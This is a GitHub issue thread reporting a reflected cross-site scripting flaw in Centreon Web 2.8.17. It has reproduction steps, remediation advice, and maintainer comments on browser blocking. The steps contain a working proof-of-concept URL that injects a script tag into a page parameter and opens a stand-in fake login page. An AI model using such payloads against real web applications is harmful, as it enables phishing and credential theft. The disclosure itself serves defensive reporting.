### ISSUE TITLE
Security issue : Reflected cross-site scripting using by forging URL

### ISSUE THREAD

**Issue by larkoie** [centreon/centreon#6084]
Hi guys,

We had an internal vulnerability testing on our centreon instance and it came out with this pretty critical Cross-Site scripting issue by passing script in the URL. Please find the security team recommendations at the end.

---------------------------------------------------
BUG REPORT INFORMATION
---------------------------------------------------

**Centreon Web version**: 2.8.17

**Centreon Engine version**: 1.7.3

**Centreon Broker version**: 3.0.3

**OS**: CentOS 7

**Steps to reproduce the issue:**
1. Log into the application with any valid user.
2. In the browser’s address bar, type the following URL: 
https://mycentreon.com/centreon/include/home/customViews/views.php? currentView=1"/><script>window.open("http://myfakeurl.com/fakeLogin.html")</script> and press the Enter key.

**Describe the results you received:**
The embedded script will execute a fake login page. Credentials, tokens or sensitive information related to the application is being exposed since the application is not properly managing a cross-site scripting input control.

**Describe the results you expected:**
Nothing happens, the normal page is displayed.

**Additional information you think important (e.g. issue happens only occasionally):**
**Important Note:** This issue is present throughout the application. Links listed below are just additional examples of other occurrences. Consider an application-wide fixing strategy.

**Recommendation(s):**
1. If possible, do not allow this information to be reflected or sent back to the user.
2. If this is not possible, then HTML encode all the data so that tags and scripts are interpreted as plain text by the browser.
3. Implement strong and positive validation to ensure that user input only contains the expected characters, data type, format, range, and size.

**Comment by lpinsivy** [comment]
Should be blocked by the browser right?

In my case (Chrome 64.0.3282.167) the answer of this URI is: ERR_BLOCKED_BY_XSS_AUDITOR

**Comment by larkoie** [comment]
I have the same version of Chrome and it works if pop-up blocker is disabled for this site.

**Comment by avihlbi** [comment]
Hi, same question as issue 6083 and 6082 , the issue above was fixed? and does it affect other versions besides 2.8.17? 
Thank you

**Comment by lpinsivy** [comment]
Should not be reproductible:

<img width="1440" alt="fakelogin" src="https://user-images.githubusercontent.com/3351916/100753959-c119f600-33ea-11eb-862d-601cd896f2ec.png">
